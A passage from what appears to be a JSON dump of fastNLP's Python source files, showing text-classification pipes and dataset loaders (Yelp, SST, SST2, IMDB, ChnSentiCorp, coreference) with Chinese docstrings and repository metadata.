\"3\":1, \"4\":1}, 则会删除target为\"2\"的instance,\n 且将\"1\"认为是第0类。\n :return: 传入的data_bundle\n \"\"\"\n for name in list(data_bundle.datasets.keys()):\n dataset = data_bundle.get_dataset(name)\n dataset.apply_field(lambda target: tag_map.get(target, -100), field_name=Const.TARGET,\n new_field_name=Const.TARGET)\n dataset.drop(lambda ins: ins[Const.TARGET] == -100)\n data_bundle.set_dataset(dataset, name)\n return data_bundle\n\n\ndef _clean_str(words):\n \"\"\"\n heavily borrowed from github\n https://github.com/LukeZhuang/Hierarchical-Attention-Network/blob/master/yelp-preprocess.ipynb\n :param sentence: is a str\n :return:\n \"\"\"\n words_collection = []\n for word in words:\n if word in ['-lrb-', '-rrb-', '<sssss>', '-r', '-l', 'b-']:\n continue\n tt = nonalpnum.split(word)\n t = ''.join(tt)\n if t != '':\n words_collection.append(t)\n \n return words_collection\n\n\nclass YelpFullPipe(_CLSPipe):\n \"\"\"\n 处理YelpFull的数据, 处理之后DataSet中的内容如下\n\n .. csv-table:: 下面是使用YelpFullPipe处理后的DataSet所具备的field\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"It 's a ...\", \"[4, 2, 10, ...]\", 0, 10\n \"Offers that ...\", \"[20, 40, ...]\", 1, 21\n \"...\", \"[...]\", ., .\n\n \"\"\"\n \n def __init__(self, lower: bool = False, granularity=5, tokenizer: str = 'spacy'):\n \"\"\"\n \n :param bool lower: 是否对输入进行小写化。\n :param int granularity: 支持2, 3, 5。若为2, 则认为是2分类问题,将1、2归为1类,4、5归为一类,丢掉2;若为3, 则有3分类问题,将\n 1、2归为1类,3归为1类,4、5归为1类;若为5, 则有5分类问题。\n :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.lower = lower\n assert granularity in (2, 3, 5), \"granularity can only be 2,3,5.\"\n self.granularity = granularity\n \n if granularity == 2:\n self.tag_map = {\"1\": 0, \"2\": 0, \"4\": 1, \"5\": 1}\n elif granularity == 3:\n self.tag_map = {\"1\": 0, \"2\": 0, \"3\": 1, \"4\": 2, \"5\": 2}\n else:\n self.tag_map = {\"1\": 0, \"2\": 1, \"3\": 2, \"4\": 3, \"5\": 4}\n \n def _tokenize(self, data_bundle, field_name=Const.INPUT, new_field_name=None):\n \"\"\"\n 将DataBundle中的数据进行tokenize\n\n :param DataBundle data_bundle:\n :param str field_name:\n :param str new_field_name:\n :return: 传入的DataBundle对象\n \"\"\"\n new_field_name = new_field_name or field_name\n for name, dataset in data_bundle.datasets.items():\n dataset.apply_field(self.tokenizer, field_name=field_name, new_field_name=new_field_name)\n dataset.apply_field(_clean_str, field_name=field_name, new_field_name=new_field_name)\n return data_bundle\n \n def process(self, data_bundle):\n \"\"\"\n 传入的DataSet应该具备如下的结构\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"I got 'new' tires from them and... \", \"1\"\n \"Don't waste your time. We had two...\", \"1\"\n \"...\", \"...\"\n\n :param data_bundle:\n :return:\n \"\"\"\n \n # 复制一列words\n data_bundle = _add_words_field(data_bundle, lower=self.lower)\n \n # 进行tokenize\n data_bundle = self._tokenize(data_bundle=data_bundle, field_name=Const.INPUT)\n \n # 根据granularity设置tag\n data_bundle = self._granularize(data_bundle, tag_map=self.tag_map)\n \n # 删除空行\n data_bundle = _drop_empty_instance(data_bundle, field_name=Const.INPUT)\n \n # index\n data_bundle = _indexize(data_bundle=data_bundle)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n \n data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n data_bundle.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n \"\"\"\n\n :param paths:\n :return: DataBundle\n \"\"\"\n data_bundle = YelpFullLoader().load(paths)\n return self.process(data_bundle=data_bundle)\n\n\nclass YelpPolarityPipe(_CLSPipe):\n \"\"\"\n 处理YelpPolarity的数据, 处理之后DataSet中的内容如下\n\n .. csv-table:: 下面是使用YelpFullPipe处理后的DataSet所具备的field\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"It 's a ...\", \"[4, 2, 10, ...]\", 0, 10\n \"Offers that ...\", \"[20, 40, ...]\", 1, 21\n \"...\", \"[...]\", ., .\n\n \"\"\"\n \n def __init__(self, lower: bool = False, tokenizer: str = 'spacy'):\n \"\"\"\n \n :param bool lower: 是否对输入进行小写化。\n :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.lower = lower\n \n def process(self, data_bundle):\n # 复制一列words\n data_bundle = _add_words_field(data_bundle, lower=self.lower)\n \n # 进行tokenize\n data_bundle = self._tokenize(data_bundle=data_bundle, field_name=Const.INPUT)\n # index\n data_bundle = _indexize(data_bundle=data_bundle)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n \n data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n data_bundle.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n \"\"\"\n\n :param str paths:\n :return: DataBundle\n \"\"\"\n data_bundle = YelpPolarityLoader().load(paths)\n return self.process(data_bundle=data_bundle)\n\n\nclass SSTPipe(_CLSPipe):\n \"\"\"\n 经过该Pipe之后,DataSet中具备的field如下所示\n\n .. csv-table:: 下面是使用SSTPipe处理后的DataSet所具备的field\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"It 's a ...\", \"[4, 2, 10, ...]\", 0, 16\n \"Offers that ...\", \"[20, 40, ...]\", 1, 18\n \"...\", \"[...]\", ., .\n\n \"\"\"\n \n def __init__(self, subtree=False, train_subtree=True, lower=False, granularity=5, tokenizer='spacy'):\n \"\"\"\n \n :param bool subtree: 是否将train, test, dev数据展开为子树,扩充数据量。 Default: ``False``\n :param bool train_subtree: 是否将train集通过子树扩展数据。\n :param bool lower: 是否对输入进行小写化。\n :param int granularity: 支持2, 3, 5。若为2, 则认为是2分类问题,将0、1归为1类,3、4归为一类,丢掉2;若为3, 则有3分类问题,将\n 0、1归为1类,2归为1类,3、4归为1类;若为5, 则有5分类问题。\n :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.subtree = subtree\n self.train_tree = train_subtree\n self.lower = lower\n assert granularity in (2, 3, 5), \"granularity can only be 2,3,5.\"\n self.granularity = granularity\n \n if granularity == 2:\n self.tag_map = {\"0\": 0, \"1\": 0, \"3\": 1, \"4\": 1}\n elif granularity == 3:\n self.tag_map = {\"0\": 0, \"1\": 0, \"2\": 1, \"3\": 2, \"4\": 2}\n else:\n self.tag_map = {\"0\": 0, \"1\": 1, \"2\": 2, \"3\": 3, \"4\": 4}\n \n def process(self, data_bundle: DataBundle):\n \"\"\"\n 对DataBundle中的数据进行预处理。输入的DataSet应该至少拥有raw_words这一列,且内容类似与\n\n .. csv-table::\n :header: \"raw_words\"\n\n \"(3 (2 It) (4 (4 (2 's) (4 (3 (2 a)...\"\n \"(4 (4 (2 Offers) (3 (3 (2 that) (3 (3 rare)...\"\n \"...\"\n\n :param ~fastNLP.io.DataBundle data_bundle: 需要处理的DataBundle对象\n :return:\n \"\"\"\n # 先取出subtree\n for name in list(data_bundle.datasets.keys()):\n dataset = data_bundle.get_dataset(name)\n ds = DataSet()\n use_subtree = self.subtree or (name == 'train' and self.train_tree)\n for ins in dataset:\n raw_words = ins['raw_words']\n tree = Tree.fromstring(raw_words)\n if use_subtree:\n for t in tree.subtrees():\n raw_words = \" \".join(t.leaves())\n instance = Instance(raw_words=raw_words, target=t.label())\n ds.append(instance)\n else:\n instance = Instance(raw_words=' '.join(tree.leaves()), target=tree.label())\n ds.append(instance)\n data_bundle.set_dataset(ds, name)\n \n _add_words_field(data_bundle, lower=self.lower)\n \n # 进行tokenize\n data_bundle = self._tokenize(data_bundle=data_bundle, field_name=Const.INPUT)\n \n # 根据granularity设置tag\n data_bundle = self._granularize(data_bundle, tag_map=self.tag_map)\n \n # index\n data_bundle = _indexize(data_bundle=data_bundle)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n \n data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n data_bundle.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n data_bundle = SSTLoader().load(paths)\n return self.process(data_bundle=data_bundle)\n\n\nclass SST2Pipe(_CLSPipe):\n \"\"\"\n 加载SST2的数据, 处理完成之后DataSet将拥有以下的field\n\n .. csv-table::\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"it 's a charming and... \", \"[3, 4, 5, 6, 7,...]\", 1, 43\n \"unflinchingly bleak and...\", \"[10, 11, 7,...]\", 1, 21\n \"...\", \"...\", ., .\n\n \"\"\"\n \n def __init__(self, lower=False, tokenizer='spacy'):\n \"\"\"\n \n :param bool lower: 是否对输入进行小写化。\n :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.lower = lower\n \n def process(self, data_bundle: DataBundle):\n \"\"\"\n 可以处理的DataSet应该具备如下的结构\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"it 's a charming and... \", 1\n \"unflinchingly bleak and...\", 1\n \"...\", \"...\"\n\n :param data_bundle:\n :return:\n \"\"\"\n _add_words_field(data_bundle, self.lower)\n \n data_bundle = self._tokenize(data_bundle=data_bundle)\n \n src_vocab = Vocabulary()\n src_vocab.from_dataset(data_bundle.datasets['train'], field_name=Const.INPUT,\n no_create_entry_dataset=[dataset for name, dataset in data_bundle.datasets.items() if\n name != 'train'])\n src_vocab.index_dataset(*data_bundle.datasets.values(), field_name=Const.INPUT)\n \n tgt_vocab = Vocabulary(unknown=None, padding=None)\n tgt_vocab.from_dataset(*[ds for name, ds in data_bundle.iter_datasets() if 'train' in name],\n field_name=Const.TARGET,\n no_create_entry_dataset=[ds for name, ds in data_bundle.iter_datasets()\n if ('train' not in name) and (ds.has_field(Const.TARGET))]\n )\n if len(tgt_vocab._no_create_word) > 0:\n warn_msg = f\"There are {len(tgt_vocab._no_create_word)} target labels\" \\\n f\" in {[name for name in data_bundle.datasets.keys() if 'train' not in name]} \" \\\n f\"data set but not in train data set!.\"\n warnings.warn(warn_msg)\n logger.warn(warn_msg)\n datasets = []\n for name, dataset in data_bundle.datasets.items():\n if dataset.has_field(Const.TARGET):\n datasets.append(dataset)\n tgt_vocab.index_dataset(*datasets, field_name=Const.TARGET)\n \n data_bundle.set_vocab(src_vocab, Const.INPUT)\n data_bundle.set_vocab(tgt_vocab, Const.TARGET)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n \n data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n data_bundle.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n \"\"\"\n\n :param str paths: 如果为None,则自动下载并缓存到fastNLP的缓存地址。\n :return: DataBundle\n \"\"\"\n data_bundle = SST2Loader().load(paths)\n return self.process(data_bundle)\n\n\nclass IMDBPipe(_CLSPipe):\n \"\"\"\n 经过本Pipe处理后DataSet将如下\n\n .. csv-table:: 输出DataSet的field\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"Bromwell High is a cartoon ... \", \"[3, 5, 6, 9, ...]\", 0, 20\n \"Story of a man who has ...\", \"[20, 43, 9, 10, ...]\", 1, 31\n \"...\", \"[...]\", ., .\n\n 其中raw_words为str类型,是原文; words是转换为index的输入; target是转换为index的目标值;\n words列被设置为input; target列被设置为target。\n\n \"\"\"\n \n def __init__(self, lower: bool = False, tokenizer: str = 'spacy'):\n \"\"\"\n \n :param bool lower: 是否将words列的数据小写。\n :param str tokenizer: 使用什么tokenizer来将句子切分为words. 支持spacy, raw两种。raw即使用空格拆分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.lower = lower\n \n def process(self, data_bundle: DataBundle):\n \"\"\"\n 期待的DataBunlde中输入的DataSet应该类似于如下,有两个field,raw_words和target,且均为str类型\n\n .. csv-table:: 输入DataSet的field\n :header: \"raw_words\", \"target\"\n\n \"Bromwell High is a cartoon ... \", \"pos\"\n \"Story of a man who has ...\", \"neg\"\n \"...\", \"...\"\n\n :param DataBunlde data_bundle: 传入的DataBundle中的DataSet必须包含raw_words和target两个field,且raw_words列应该为str,\n target列应该为str。\n :return: DataBundle\n \"\"\"\n \n # 替换<br />\n def replace_br(raw_words):\n raw_words = raw_words.replace(\"<br />\", ' ')\n return raw_words\n \n for name, dataset in data_bundle.datasets.items():\n dataset.apply_field(replace_br, field_name=Const.RAW_WORD, new_field_name=Const.RAW_WORD)\n \n _add_words_field(data_bundle, lower=self.lower)\n self._tokenize(data_bundle, field_name=Const.INPUT, new_field_name=Const.INPUT)\n _indexize(data_bundle)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n dataset.set_input(Const.INPUT, Const.INPUT_LEN)\n dataset.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n \"\"\"\n\n :param paths: 支持路径类型参见 :class:`fastNLP.io.loader.Loader` 的load函数。\n :return: DataBundle\n \"\"\"\n # 读取数据\n data_bundle = IMDBLoader().load(paths)\n data_bundle = self.process(data_bundle)\n \n return data_bundle\n\n\nclass ChnSentiCorpPipe(Pipe):\n \"\"\"\n 处理之后的DataSet有以下的结构\n\n .. csv-table::\n :header: \"raw_chars\", \"chars\", \"target\", \"seq_len\"\n\n \"這間酒店環境和服務態度亦算不錯,但房間空間太小~~\", \"[2, 3, 4, 5, ...]\", 1, 31\n \"<荐书> 推荐所有喜欢<红楼>...\", \"[10, 21, ....]\", 1, 25\n \"...\"\n\n 其中chars, seq_len是input,target是target\n\n \"\"\"\n def __init__(self, bigrams=False, trigrams=False):\n \"\"\"\n \n :param bool bigrams: 是否增加一列bigrams. bigrams的构成是['复', '旦', '大', '学', ...]->[\"复旦\", \"旦大\", ...]。如果\n 设置为True,返回的DataSet将有一列名为bigrams, 且已经转换为了index并设置为input,对应的vocab可以通过\n data_bundle.get_vocab('bigrams')获取.\n :param bool trigrams: 是否增加一列trigrams. trigrams的构成是 ['复', '旦', '大', '学', ...]->[\"复旦大\", \"旦大学\", ...]\n 。如果设置为True,返回的DataSet将有一列名为trigrams, 且已经转换为了index并设置为input,对应的vocab可以通过\n data_bundle.get_vocab('trigrams')获取.\n \"\"\"\n super().__init__()\n\n self.bigrams = bigrams\n self.trigrams = trigrams\n\n def _tokenize(self, data_bundle):\n \"\"\"\n 将DataSet中的\"复旦大学\"拆分为[\"复\", \"旦\", \"大\", \"学\"]. 未来可以通过扩展这个函数实现分词。\n\n :param data_bundle:\n :return:\n \"\"\"\n data_bundle.apply_field(list, field_name=Const.CHAR_INPUT, new_field_name=Const.CHAR_INPUT)\n return data_bundle\n\n def process(self, data_bundle:DataBundle):\n \"\"\"\n 可以处理的DataSet应该具备以下的field\n\n .. csv-table::\n :header: \"raw_chars\", \"target\"\n\n \"這間酒店環境和服務態度亦算不錯,但房間空間太小~~\", \"1\"\n \"<荐书> 推荐所有喜欢<红楼>...\", \"1\"\n \"...\"\n\n :param data_bundle:\n :return:\n \"\"\"\n _add_chars_field(data_bundle, lower=False)\n\n data_bundle = self._tokenize(data_bundle)\n\n input_field_names = [Const.CHAR_INPUT]\n if self.bigrams:\n for name, dataset in data_bundle.iter_datasets():\n dataset.apply_field(lambda chars: [c1 + c2 for c1, c2 in zip(chars, chars[1:] + ['<eos>'])],\n field_name=Const.CHAR_INPUT, new_field_name='bigrams')\n input_field_names.append('bigrams')\n if self.trigrams:\n for name, dataset in data_bundle.iter_datasets():\n dataset.apply_field(lambda chars: [c1 + c2 + c3 for c1, c2, c3 in\n zip(chars, chars[1:] + ['<eos>'], chars[2:] + ['<eos>'] * 2)],\n field_name=Const.CHAR_INPUT, new_field_name='trigrams')\n input_field_names.append('trigrams')\n\n # index\n _indexize(data_bundle, input_field_names, Const.TARGET)\n\n input_fields = [Const.TARGET, Const.INPUT_LEN] + input_field_names\n target_fields = [Const.TARGET]\n\n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.CHAR_INPUT)\n\n data_bundle.set_input(*input_fields)\n data_bundle.set_target(*target_fields)\n\n return data_bundle\n\n def process_from_file(self, paths=None):\n \"\"\"\n\n :param paths: 支持路径类型参见 :class:`fastNLP.io.loader.Loader` 的load函数。\n :return: DataBundle\n \"\"\"\n # 读取数据\n data_bundle = ChnSentiCorpLoader().load(paths)\n data_bundle = self.process(data_bundle)\n\n return data_bundle" }, { "alpha_fraction": 0.5406790375709534, "alphanum_fraction": 0.5579756498336792, "avg_line_length": 30.219999313354492, "blob_id": "fb44a64c4616765051d6e3bf88428bce66cce34f", "content_id": "4293f65ac37a1af0948ec6905be76e4cdc192f15", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "permissive", "max_line_length": 117, "num_lines": 50, "path": "/fastNLP/io/loader/coreference.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"CoReferenceLoader\",\n]\n\nfrom ...core.dataset import DataSet\nfrom ..file_reader import _read_json\nfrom ...core.instance import Instance\nfrom ...core.const import Const\nfrom .json import JsonLoader\n\n\nclass CoReferenceLoader(JsonLoader):\n \"\"\"\n 原始数据中内容应该为, 每一行为一个json对象,其中doc_key包含文章的种类信息,speakers包含每句话的说话者信息,cluster是指向现实中同一个事物的聚集,sentences是文本信息内容。\n\n Example::\n\n {\"doc_key\":\"bc/cctv/00/cctv_001\",\n \"speakers\":\"[[\"Speaker1\",\"Speaker1\",\"Speaker1\"],[\"Speaker1\",\"Speaker1\",\"Speaker1\"]]\",\n \"clusters\":\"[[[2,3],[4,5]],[7,8],[18,20]]]\",\n \"sentences\":[[\"I\",\"have\",\"an\",\"apple\"],[\"It\",\"is\",\"good\"]]\n }\n\n 读取预处理好的Conll2012数据。\n\n \"\"\"\n def __init__(self, fields=None, dropna=False):\n super().__init__(fields, dropna)\n # self.fields = {\"doc_key\":Const.INPUTS(0),\"speakers\":Const.INPUTS(1),\n # \"clusters\":Const.TARGET,\"sentences\":Const.INPUTS(2)}\n self.fields = {\"doc_key\": Const.RAW_WORDS(0), \"speakers\": Const.RAW_WORDS(1), \"clusters\": Const.RAW_WORDS(2),\n \"sentences\": Const.RAW_WORDS(3)}\n\n def _load(self, path):\n \"\"\"\n 加载数据\n :param path: 数据文件路径,文件为json\n\n :return:\n \"\"\"\n dataset = DataSet()\n for idx, d in _read_json(path, fields=self.fields_list, dropna=self.dropna):\n if self.fields:\n ins = {self.fields[k]: v for k, v in d.items()}\n else:\n ins = d\n dataset.append(Instance(**ins))\n return dataset\n" }, { "alpha_fraction": 0.49556246399879456, "alphanum_fraction": 0.5070924758911133, "avg_line_length": 32.12311553955078, "blob_id": "99649ce13db131a99667df920035f05d7a05b0ab", "content_id": "ac1bba223cefd0717afbffad2b5392ecb323c1f1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14865, "license_type": "permissive", "max_line_length": 110, "num_lines": 398, "path": "/fastNLP/io/loader/classification.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"YelpLoader\",\n \"YelpFullLoader\",\n \"YelpPolarityLoader\",\n \"IMDBLoader\",\n \"SSTLoader\",\n \"SST2Loader\",\n \"ChnSentiCorpLoader\"\n]\n\nimport glob\nimport os\nimport random\nimport shutil\nimport time\nimport warnings\n\nfrom .loader import Loader\nfrom ...core.dataset import DataSet\nfrom ...core.instance import Instance\n\n\nclass YelpLoader(Loader):\n \"\"\"\n 原始数据中内容应该为, 每一行为一个sample,第一个逗号之前为target,第一个逗号之后为文本内容。\n\n Example::\n \n \"1\",\"I got 'new' tires from the...\"\n \"1\",\"Don't waste your time...\"\n\n 读取的DataSet将具备以下的数据结构\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"I got 'new' tires from them and... \", \"1\"\n \"Don't waste your time. We had two...\", \"1\"\n \"...\", \"...\"\n\n \"\"\"\n \n def __init__(self):\n super(YelpLoader, self).__init__()\n \n def _load(self, path: str = None):\n ds = DataSet()\n with open(path, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n sep_index = line.index(',')\n target = line[:sep_index]\n raw_words = line[sep_index + 1:]\n if target.startswith(\"\\\"\"):\n target = target[1:]\n if target.endswith(\"\\\"\"):\n target = target[:-1]\n if raw_words.endswith(\"\\\"\"):\n raw_words = raw_words[:-1]\n if raw_words.startswith('\"'):\n raw_words = raw_words[1:]\n raw_words = raw_words.replace('\"\"', '\"') # 替换双引号\n if raw_words:\n ds.append(Instance(raw_words=raw_words, target=target))\n return ds\n\n\nclass YelpFullLoader(YelpLoader):\n def download(self, dev_ratio: float = 0.1, re_download: bool = False):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n Xiang Zhang, Junbo Zhao, Yann LeCun. Character-level Convolutional Networks for Text Classification. Advances\n in Neural Information Processing Systems 28 (NIPS 2015)\n\n 根据dev_ratio的值随机将train中的数据取出一部分作为dev数据。下载完成后在output_dir中有train.csv, test.csv,\n dev.csv三个文件。\n\n :param float dev_ratio: 如果路径中没有dev集,从train划分多少作为dev的数据. 如果为0,则不划分dev。\n :param bool re_download: 是否重新下载数据,以重新切分数据。\n :return: str, 数据集的目录地址\n \"\"\"\n \n dataset_name = 'yelp-review-full'\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n modify_time = 0\n for filepath in glob.glob(os.path.join(data_dir, '*')):\n modify_time = os.stat(filepath).st_mtime\n break\n if time.time() - modify_time > 1 and re_download: # 通过这种比较丑陋的方式判断一下文件是否是才下载的\n shutil.rmtree(data_dir)\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n \n if not os.path.exists(os.path.join(data_dir, 'dev.csv')):\n if dev_ratio > 0:\n assert 0 < dev_ratio < 1, \"dev_ratio should be in range (0,1).\"\n try:\n with open(os.path.join(data_dir, 'train.csv'), 'r', encoding='utf-8') as f, \\\n open(os.path.join(data_dir, 'middle_file.csv'), 'w', encoding='utf-8') as f1, \\\n open(os.path.join(data_dir, 'dev.csv'), 'w', encoding='utf-8') as f2:\n for line in f:\n if random.random() < dev_ratio:\n f2.write(line)\n else:\n f1.write(line)\n os.remove(os.path.join(data_dir, 'train.csv'))\n os.renames(os.path.join(data_dir, 'middle_file.csv'), os.path.join(data_dir, 'train.csv'))\n finally:\n if os.path.exists(os.path.join(data_dir, 'middle_file.csv')):\n os.remove(os.path.join(data_dir, 'middle_file.csv'))\n \n return data_dir\n\n\nclass YelpPolarityLoader(YelpLoader):\n def download(self, dev_ratio: float = 0.1, re_download=False):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n Xiang Zhang, Junbo Zhao, Yann LeCun. Character-level Convolutional Networks for Text Classification. Advances\n in Neural Information Processing Systems 28 (NIPS 2015)\n\n 根据dev_ratio的值随机将train中的数据取出一部分作为dev数据。下载完成后从train中切分dev_ratio这么多作为dev\n\n :param float dev_ratio: 如果路径中不存在dev.csv, 从train划分多少作为dev的数据。 如果为0,则不划分dev。\n :param bool re_download: 是否重新下载数据,以重新切分数据。\n :return: str, 数据集的目录地址\n \"\"\"\n dataset_name = 'yelp-review-polarity'\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n modify_time = 0\n for filepath in glob.glob(os.path.join(data_dir, '*')):\n modify_time = os.stat(filepath).st_mtime\n break\n if time.time() - modify_time > 1 and re_download: # 通过这种比较丑陋的方式判断一下文件是否是才下载的\n shutil.rmtree(data_dir)\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n \n if not os.path.exists(os.path.join(data_dir, 'dev.csv')):\n if dev_ratio > 0:\n assert 0 < dev_ratio < 1, \"dev_ratio should be in range (0,1).\"\n try:\n with open(os.path.join(data_dir, 'train.csv'), 'r', encoding='utf-8') as f, \\\n open(os.path.join(data_dir, 'middle_file.csv'), 'w', encoding='utf-8') as f1, \\\n open(os.path.join(data_dir, 'dev.csv'), 'w', encoding='utf-8') as f2:\n for line in f:\n if random.random() < dev_ratio:\n f2.write(line)\n else:\n f1.write(line)\n os.remove(os.path.join(data_dir, 'train.csv'))\n os.renames(os.path.join(data_dir, 'middle_file.csv'), os.path.join(data_dir, 'train.csv'))\n finally:\n if os.path.exists(os.path.join(data_dir, 'middle_file.csv')):\n os.remove(os.path.join(data_dir, 'middle_file.csv'))\n \n return data_dir\n\n\nclass IMDBLoader(Loader):\n \"\"\"\n IMDBLoader读取后的数据将具有以下两列内容: raw_words: str, 需要分类的文本; target: str, 文本的标签\n DataSet具备以下的结构:\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"Bromwell High is a cartoon ... \", \"pos\"\n \"Story of a man who has ...\", \"neg\"\n \"...\", \"...\"\n\n \"\"\"\n \n def __init__(self):\n super(IMDBLoader, self).__init__()\n \n def _load(self, path: str):\n dataset = DataSet()\n with open(path, 'r', encoding=\"utf-8\") as f:\n for line in f:\n line = line.strip()\n if not line:\n continue\n parts = line.split('\\t')\n target = parts[0]\n words = parts[1]\n if words:\n dataset.append(Instance(raw_words=words, target=target))\n \n if len(dataset) == 0:\n raise RuntimeError(f\"{path} has no valid data.\")\n \n return dataset\n \n def download(self, dev_ratio: float = 0.1, re_download=False):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n http://www.aclweb.org/anthology/P11-1015\n\n 根据dev_ratio的值随机将train中的数据取出一部分作为dev数据。下载完成后从train中切分0.1作为dev\n\n :param float dev_ratio: 如果路径中没有dev.txt。从train划分多少作为dev的数据. 如果为0,则不划分dev\n :param bool re_download: 是否重新下载数据,以重新切分数据。\n :return: str, 数据集的目录地址\n \"\"\"\n dataset_name = 'aclImdb'\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n modify_time = 0\n for filepath in glob.glob(os.path.join(data_dir, '*')):\n modify_time = os.stat(filepath).st_mtime\n break\n if time.time() - modify_time > 1 and re_download: # 通过这种比较丑陋的方式判断一下文件是否是才下载的\n shutil.rmtree(data_dir)\n data_dir = self._get_dataset_path(dataset_name=dataset_name)\n \n if not os.path.exists(os.path.join(data_dir, 'dev.csv')):\n if dev_ratio > 0:\n assert 0 < dev_ratio < 1, \"dev_ratio should be in range (0,1).\"\n try:\n with open(os.path.join(data_dir, 'train.txt'), 'r', encoding='utf-8') as f, \\\n open(os.path.join(data_dir, 'middle_file.txt'), 'w', encoding='utf-8') as f1, \\\n open(os.path.join(data_dir, 'dev.txt'), 'w', encoding='utf-8') as f2:\n for line in f:\n if random.random() < dev_ratio:\n f2.write(line)\n else:\n f1.write(line)\n os.remove(os.path.join(data_dir, 'train.txt'))\n os.renames(os.path.join(data_dir, 'middle_file.txt'), os.path.join(data_dir, 'train.txt'))\n finally:\n if os.path.exists(os.path.join(data_dir, 'middle_file.txt')):\n os.remove(os.path.join(data_dir, 'middle_file.txt'))\n \n return data_dir\n\n\nclass SSTLoader(Loader):\n \"\"\"\n 读取之后的DataSet具有以下的结构\n\n .. csv-table:: 下面是使用SSTLoader读取的DataSet所具备的field\n :header: \"raw_words\"\n\n \"(3 (2 It) (4 (4 (2 's) (4 (3 (2 a)...\"\n \"(4 (4 (2 Offers) (3 (3 (2 that) (3 (3 rare)...\"\n \"...\"\n\n raw_words列是str。\n\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path: str):\n \"\"\"\n 从path读取SST文件\n\n :param str path: 文件路径\n :return: DataSet\n \"\"\"\n ds = DataSet()\n with open(path, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n if line:\n ds.append(Instance(raw_words=line))\n return ds\n \n def download(self):\n \"\"\"\n 自动下载数据集,如果你使用了这个数据集,请引用以下的文章\n\n https://nlp.stanford.edu/~socherr/EMNLP2013_RNTN.pdf\n\n :return: str, 数据集的目录地址\n \"\"\"\n output_dir = self._get_dataset_path(dataset_name='sst')\n return output_dir\n\n\nclass SST2Loader(Loader):\n \"\"\"\n 数据SST2的Loader\n 读取之后DataSet将如下所示\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"it 's a charming and often affecting...\", \"1\"\n \"unflinchingly bleak and...\", \"0\"\n \"...\"\n\n test的DataSet没有target列。\n \"\"\"\n \n def __init__(self):\n super().__init__()\n \n def _load(self, path: str):\n \"\"\"\n 从path读取SST2文件\n\n :param str path: 数据路径\n :return: DataSet\n \"\"\"\n ds = DataSet()\n \n with open(path, 'r', encoding='utf-8') as f:\n f.readline() # 跳过header\n if 'test' in os.path.split(path)[1]:\n warnings.warn(\"SST2's test file has no target.\")\n for line in f:\n line = line.strip()\n if line:\n sep_index = line.index('\\t')\n raw_words = line[sep_index + 1:]\n if raw_words:\n ds.append(Instance(raw_words=raw_words))\n else:\n for line in f:\n line = line.strip()\n if line:\n raw_words = line[:-2]\n target = line[-1]\n if raw_words:\n ds.append(Instance(raw_words=raw_words, target=target))\n return ds\n \n def download(self):\n \"\"\"\n 自动下载数据集,如果你使用了该数据集,请引用以下的文章\n\n 